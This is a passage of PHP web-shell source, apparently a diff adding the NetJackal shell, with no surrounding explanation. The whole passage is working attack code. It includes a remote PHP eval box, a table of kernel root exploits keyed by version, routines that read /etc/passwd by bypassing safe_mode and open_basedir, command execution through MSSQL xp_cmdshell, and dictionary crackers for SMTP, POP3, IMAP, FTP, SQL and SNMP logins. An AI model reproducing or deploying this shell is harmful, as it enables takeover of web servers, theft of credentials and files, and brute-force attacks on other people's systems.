">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MSSQL')echo 'selected';echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";if ($_REQUEST['typE']=='Oracle')echo 'selected';echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';echo ">PostgreSQL</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root'; echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value='";if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123456'; echo "' name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text value='";if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']); echo "' name=dB size=35></td><tr><td width='20%' bgcolor='#666666'>Query:</td><td bgcolor='#666666'><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "</textarea></td></tr></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Submit Query'></form>$et</center>"; +} +function querY($type,$host,$user,$pass,$db='',$query){ +$res=''; +switch($type){ +case 'MySQL': +if(!function_exists('mysql_connect'))return 0; +$link=mysql_connect($host,$user,$pass); +if($link){ +if(!empty($db))mysql_select_db($db,$link); +$result=mysql_query($query,$link); +while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<mysql_num_fields($result);$i++) +$res.=mysql_field_name($result,$i).'[-][-][-]'; +mysql_close($link); +return $res; +} +break; +case 'MSSQL': +if(!function_exists('mssql_connect'))return 0; +$link=mssql_connect($host,$user,$pass); +if($link){ +if(!empty($db))mssql_select_db($db,$link); +$result=mssql_query($query,$link); +while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<mssql_num_fields($result);$i++) +$res.=mssql_field_name($result,$i).'[-][-][-]'; +mssql_close($link); +return $res; +} +break; +case 'Oracle': +if(!function_exists('ocilogon'))return 0; +$link=ocilogon($user,$pass,$db); +if($link){ +$stm=ociparse($link,$query); +ociexecute($stm,OCI_DEFAULT); +while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<oci_num_fields($stm);$i++) +$res.=oci_field_name($stm,$i).'[-][-][-]'; +return $res; +} +break; +case 'PostgreSQL': +if(!function_exists('pg_connect'))return 0; +$link=pg_connect("host=$host dbname=$db user=$user password=$pass"); +if($link){ +$result=pg_query($link,$query); +while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<pg_num_fields($result);$i++) +$res.=pg_field_name($result,$i).'[-][-][-]'; +pg_close($link); +return $res; +} +break; +} +return 0; +} +function phpevaL(){ +global $t,$hcwd,$et; +echo '<center>'; +if(!empty($_REQUEST['code'])){ +$s=array('<?php'=>'','<?'=>'','?>'=>''); +echo "<textarea rows='10' cols='64'>";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '</textarea><br><br>'; +} +echo "${t}Evaler:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Codes:</td><td bgcolor='#666666'><textarea rows='10' name='code' cols='64'>";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Execute></form>$et</center>"; +} +function rootxpL(){ +$v=php_uname(); +$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip'); +foreach($db as $k=>$x)if(strstr($v,$k))return $x; +return 0; +} +function toolS(){ +global $t,$hcwd,$et,$cwd; +if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){ +$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5); +fputs($ser,$_REQUEST['domaiN']."\r\n"); +echo '<pre>'; +while(!feof($ser))echo fgets($ser,1024); +echo '</pre>'; +fclose($ser); +} +elseif(!empty($_REQUEST['urL'])){ +$h=''; +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port']; +$ser=fsockopen($host,$port,$en,$es,5); +if($ser){ +fputs($ser,"GET $file\r\nHost: $host\r\n\r\n"); +echo '<pre>'; +while($h!="\r\n"){$h=fgets($ser,1024);echo $h;} +echo '</pre>'; +fclose($ser); +} +} +elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){ +$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd'; +$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess'; +file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES)); +file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n"); +echo '<font color=blue>Done</font>'; +} +$s="</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>"; +echo "<center>${t}WhoIs:${s}Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'whois.geektools.com'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>domain:</td><td bgcolor='#808080'><input type=text name=domaiN value='";if (!empty($_REQUEST['domaiN'])) echo htmlspecialchars($_REQUEST['domaiN']); else echo 'google.com'; echo "' size=35></td><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value='Do'></form>$et<br>${t}.ht* generator:${s}Username:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['uN'])) echo htmlspecialchars($_REQUEST['uN']);else echo 'r00t'; echo "' name=uN size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Password:</td><td bgcolor='#808080'><input type=text name=pW value='";if (!empty($_REQUEST['pW'])) echo htmlspecialchars($_REQUEST['pW']); else echo uniqid('@'); echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Directory:</td><td bgcolor='#666666'><input type=text name=ouT value='";if (!empty($_REQUEST['ouT'])) echo htmlspecialchars($_REQUEST['ouT']); else echo $cwd; echo "' size=35></td><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab header:${s}URL:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['urL']))echo htmlspecialchars($_REQUEST['urL']);else echo 'http://netjackal.by.ru/index.htm'; echo "' name=urL size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Get'></form>$et<br></center>"; +} +function hexvieW(){ +if(!empty($_REQUEST['filE'])){ +$f=$_REQUEST['filE']; +echo "<table border=0 style='border-collapse: collapse' width='100%'><td width='10%' bgcolor='#282828'>Offset</td><td width='25%' bgcolor='#282828'>Hex</td><td width='25%' bgcolor='#282828'></td><td width='40%' bgcolor='#282828'>ASCII</td></tr>"; +$file=fopen($f,'r'); +$i=-1; +while(!feof($file)){ +$ln=''; +$i++; +echo "<tr><td width='10%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '</td>'; +echo "<td width='25%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>"; +for($j=0;$j<=7;$j++){ +if(!feof($file)){ +$tmp=strtoupper(dechex(ord(fgetc($file)))); +if(strlen($tmp)==1)$tmp='0'.$tmp; +echo $tmp.' '; +$ln.=$tmp; +} +} +echo "</td><td width='25%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>"; +for($j=7;$j<=14;$j++){ +if(!feof($file)){ +$tmp=strtoupper(dechex(ord(fgetc($file)))); +if(strlen($tmp)==1)$tmp='0'.$tmp; +echo $tmp.' '; +$ln.=$tmp; +} +} +echo "</td><td width='40%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>"; +$n=0;$asc='';$co=0; +for($k=0;$k<=16;$k++){ +$co=hexdec(substr($ln,$n,2)); +if(($co<=31)||(($co>=127)&&($co<=160)))$co=46; +$asc.=chr($co); +$n+=2; +} +echo htmlspecialchars($asc); +echo '</td></tr>'; +} +} +fclose($file); +echo '</table>'; +} +function safemodE(){ +global $windows,$t,$hcwd,$et; +$file=(empty($_REQUEST['file']))?'/etc/passwd':$_REQUEST['file']; +$pr="\r\n</font><font color=green>Method "; +$po=")</font><font color=blue>\r\n"; +$i=1; +if(!empty($_REQUEST['read'])){ +echo "<pre>$pr$i:(ini_restore$po"; +ini_restore('safe_mode');ini_restore('open_basedir'); +readfile($file); +$i++; +echo "$pr$i:(include$po"; +include($file); +$i++; +echo "$pr$i:(copy$po"; +$tmp=tempnam('','cx'); +copy('compress.zlib://'.$file,$tmp); +$fh=fopen($tmp,'r'); +$data=fread($fh,filesize($tmp)); +fclose($fh); +echo $data; +$i++; +if(function_exists('mb_send_mail')){ +echo "$pr$i:(mb_send_mail$po"; +if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail'); +mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail'); +readfile('/tmp/mb_send_mail'); +$i++; +} +if(function_exists('curl_init')){ +echo "$pr$i:(curl_init [A]$po"; +$fh=curl_init('file://'.$file.''); +$tmp=curl_exec($fh); +echo $tmp; +$i++; +echo "$pr$i:(curl_init [B]$po"; +$i++; +if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__); +else $ch=curl_init('file://'.$file."\x00".__FILE__); +var_dump(curl_exec($ch)); +} +if(is_writable('.')){ +echo "$pr$i:(php.ini$po"; +file_put_contents('php.ini','safe_mode = Off'); +readfile($file); +unlink('php.ini'); +$i++; +} +if(is_object($ws=new COM('WScript.Shell'))){ +echo "$pr$i:(COM$po"; +echo $exec=comshelL("type \"$file\"",$ws); +$i++; +} +if(checkfunctioN('win_shell_execute')){ +echo "$pr$i:(win32std$po"; +echo winshelL("type \"$file\""); +$i++; +} +if(checkfunctioN('win32_create_service')){ +echo "$pr$i:(win32service$po"; +echo srvshelL("type \"$file\""); +$i++; +} +if(function_exists('imap_open')){ +echo "$pr$i:(imap [A]$po"; +$str=imap_open('/etc/passwd','',''); +$list=imap_list($str,$file,'*'); +for($i=0;$i<count($list);$i++)echo $list[$i]."\n"; +imap_close($str); +$i++; +echo "$pr$i:(imap [B]$po"; +$str=imap_open($file,'',''); +$tmp=imap_body($str,1); +echo $tmp; +imap_close($str); +$i++; +} +if($file=='/etc/passwd'){ +echo "$pr$i:(posix$po"; +for($uid=0;$uid<99999;$uid++){ +$h=posix_getpwuid($uid); +if(!empty($h))foreach($h as $v)echo "$v:"; +echo "\r\n"; +} +} +echo "\n</pre></font>"; +} +elseif(!empty($_REQUEST['show'])){ +echo "<pre>$pr$i:(glob$po"; +$con=glob("$file*"); +foreach ($con as $v){ + echo "$v\n"; +} +$i++; +if(function_exists('imap_open')){ +echo "$pr$i:(imap$po"; +$str=imap_open('/etc/passwd','',''); +$s=explode("|",$file); +if(count($s)>1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*'); +for($i=0;$i<count($list);$i++)echo "$list[$i]\r\n"; +imap_close($str); +$i++; +} +if(is_object($ws=new COM('WScript.Shell'))){ +echo "$pr$i:(COM$po"; +$exec=comshelL("dir \"$file\"",$ws); +$exec=str_replace("\t",'',$exec); +echo $exec; +$i++; +} +if(checkfunctioN('win_shell_execute')){ +echo "$pr$i:(win32std$po"; +echo winshelL("dir \"$file\""); +$i++; +} +if(checkfunctioN('win32_create_service')){ +echo "$pr$i:(win32service$po"; +echo srvshelL("dir \"$file\""); +$i++; +} +echo "\n</pre></font>"; +} +elseif(!empty($_REQUEST['sql'])){ +$ta=uniqid('N'); +$s=array("CREATE TEMPORARY TABLE $ta (file LONGBLOB)","LOAD DATA INFILE '".addslashes($_REQUEST['file'])."' INTO TABLE $ta","SELECT * FROM $ta"); +$l=mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']); +mysql_select_db($_REQUEST['db'],$l); +echo '<pre><font color=blue>'; +foreach($s as $v){ +$q = mysql_query($v,$l); +while($d=mysql_fetch_row($q))echo htmlspecialchars($d[0]); +} +echo '</pre></font>'; +} +elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){ +$res=''; +$tb=uniqid('NJ'); +$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']); +mssql_select_db($_REQUEST['dB'],$db); +mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db); +mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db); +$re=mssql_query("select * from $tb",$db); +while(($row=mssql_fetch_row($re))) +{ +$res.= $row[0]."\r\n"; +} +mssql_query("drop table $tb",$db); +mssql_close($db); +echo "<center><textarea rows='18' cols='64'>$res</textarea></center><br>"; +} +$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd'; +$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root'; +$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456'; +$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test'; +echo "<center>${t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>$et<br>${t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='$f' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='$u'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='$p'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='$d'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit name=sql value='Read'></form>$et<br>${t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']); else echo 'sa'; echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";if (!empty($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";if (!empty($_REQUEST['coM'])) echo htmlspecialchars($_REQUEST['coM']);else echo 'dir c:';echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";if(isset($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);else echo 'master';echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hcwd<input class=buttons type=submit value='Execute'></form>$et</center>"; +} +function crackeR(){ +global $t,$et,$crack,$cwd; +$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0; +if(!empty($_REQUEST['cracK']) && !$check){ +$c=htmlspecialchars($_REQUEST['cracK']); +echo "<center>$t$c cracker:$crack"; +} +elseif(!empty($_REQUEST['cracK']) && $check){ +$pro=strtolower($_REQUEST['cracK']).'checK'; +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +if($dictionary){ +echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>'; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$ret=$pro($target,$user,$pass,5); +if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{ +if($ret){$x="U: $user P: $pass";echo "$x<br>";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}} +} +echo '<br>Done</font>'; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else{ +echo "<center><table border=0 bgcolor=#333333><tr><td><a href='".hlinK("seC=hc&workingdiR=$cwd")."'>[Hash]</a> - <a href='".hlinK("seC=cr&cracK=SMTP&workingdiR=$cwd")."'>[SMTP]</a> - <a href='".hlinK("seC=cr&cracK=POP3&workingdiR=$cwd")."'>[POP3]</a> - <a href='".hlinK("seC=cr&cracK=IMAP&workingdiR=$cwd")."'>[IMAP]</a> - <a href='".hlinK("seC=cr&cracK=FTP&workingdiR=$cwd")."'>[FTP]</a> - <a href='".hlinK("seC=snmp&workingdiR=$cwd")."'>[SNMP]</a> - <a href='".hlinK("seC=cr&cracK=MySQL&workingdiR=$cwd")."'>[MySQL]</a> - <a href='".hlinK("seC=cr&cracK=MSSQL&workingdiR=$cwd")."'>[MSSQL]</a> - <a href='".hlinK("seC=fcr&workingdiR=$cwd")."'>[HTTP Form]</a> - <a href='".hlinK("seC=auth&workingdiR=$cwd")."'>[HTTP Auth(basic)]</a> - <a href='".hlinK("seC=dic&workingdiR=$cwd")."'>[Dictionary maker]</a>$et</center>"; +} +} +function snmpcrackeR(){ +global $t,$et,$errorbox,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if($dictionary){ +echo '<font color=blue>Cracking '.htmlspecialchars($target).'...<br>'; +while(!feof($dictionary)){ +$com=trim(fgets($dictionary)," \n\r"); +$res=snmpchecK($target,$com,2); +if($res){echo "$com<br>";if($log)file_add_contentS($file,"$com\r\n");} +} +echo '<br>Done</font>'; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}SNMP cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'>$hcwd<tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit value=Start></form>$et</center>"; +} +function dicmakeR(){ +global $errorbox,$windows,$footer,$t,$et,$hcwd; +$combo=(empty($_REQUEST['combo']))?0:1; +if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ +$min=$_REQUEST['min']; +$max=$_REQUEST['max']; +if($max<$min)die($errorbox."Bad input!$et".$footer); +$s=$w=''; +$out=$_REQUEST['output']; +$r=$_REQUEST['range']; +$dic=fopen($out,'w'); +if($r==1){ +for($s=pow(10,$min-1);$s<pow(10,$max-1);$s++){ +$w=$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +} +} +else{ +$s=str_repeat($r,$min); +while(strlen($s)<$max){ +$w=$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++; +} +} +fclose($dic); +echo '<font color=blue>Done</font>'; +} +elseif(!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ +$input=fopen($_REQUEST['input'],'r'); +if(!$input){ +if($windows)echo $errorbox.'Unable to read from '.htmlspecialchars($_REQUEST['input'])."$et<br>"; +else{ +$input=explode("\n",shelL("cat $input")); +$output=fopen($_REQUEST['output'],'w'); +if($output){ +foreach($input as $in){ +$user=$in; +$user=trim(fgets($in)," \n\r"); +if(!strstr($user,':'))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo '<font color=blue>Done</font>'; +} +} +} +else{ +$output=fopen($_REQUEST['output'],'w'); +if($output){ +while(!feof($input)){ +$user=trim(fgets($input)," \n\r"); +if(!strstr($user,':'))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo '<font color=blue>Done</font>'; +} +else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et<br>"; +} +}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ +$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); +if($combo && $res){ +$file=file($_REQUEST['output']); +$output=fopen($_REQUEST['output'],'w'); +foreach($file as $v)fwrite($output,"$v:$v\n"); +fclose($output); +} +echo '<font color=blue>Done</font>'; +}else{ +$temp=whereistmP().DIRECTORY_SEPARATOR; +echo "<center>${t}Wordlist generator:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Range:</td><td bgcolor='#666666'><select name=range><option value=a>a-z</option><option value=A>A-Z</option><option value=1>0-9</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Min lenght:</td><td bgcolor='#808080'><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Max lenght:</td><td bgcolor='#666666'><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox name=combo style='border-width:1px;background-color:#666666;' value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Grab from:</td><td bgcolor='#666666'><input type=text value='/etc/passwd' name=input size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Grab></form>$et<br>${t}Download dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>URL:</td><td bgcolor='#666666'><input type=text value='http://vburton.ncsa.uiuc.edu/wordlist.txt' name=url size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Get></form>$et</center>";} +} +function ftpclienT(){ +global $t,$cwd,$hcwd,$errorbox,$et; +$td="<td bgcolor='#333333' width='50%'>"; +if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){ +$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT']; +$con=ftp_connect($_REQUEST['hosT'],21,10); +if($con){ +$ftp=ftp_login($con,$user,$pass); +if($ftp){ +if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']); +if(!empty($_REQUEST['filE'])){ +$file=$_REQUEST['filE']; +$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII; +if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode); +elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode); +elseif(isset($_REQUEST['rM'])){ +ftp_rmdir($con,$file); +ftp_delete($con,$file); +} +elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file); +} +$pwd=ftp_pwd($con); +$dir=ftp_nlist($con,''); +$d=opendir($cwd); +echo "<table border=0 style='border-collapse: collapse' width='100%'><tr>${td}Server:</td>${td}Client:</td></tr><form method=POST><tr>$td<input type=text value='$pwd' name=PWD size=50><input value=Change class=buttons type=submit></td>$td<input size=50 type=text value='$cwd' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr>$td"; +foreach($dir as $n)echo "$n<br>"; +echo "</td>$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir<br>"; echo "</td></tr><tr>${td}Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td>$td<input type=hidden value='$user' name=useR><input type=hidden value='$pass' name=pasS><input type=hidden value='$host' name=hosT></form>$et"; +}else echo "$errorbox Wrong username or password$et"; +}else echo "$errorbox Can not connect to server!$et"; +} +else{ +echo "<center>${t}FTP cilent:</td><form name=client method='POST'><td bgcolor='#333333'></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value=localhost name=hosT size=35></td></tr><tr><td 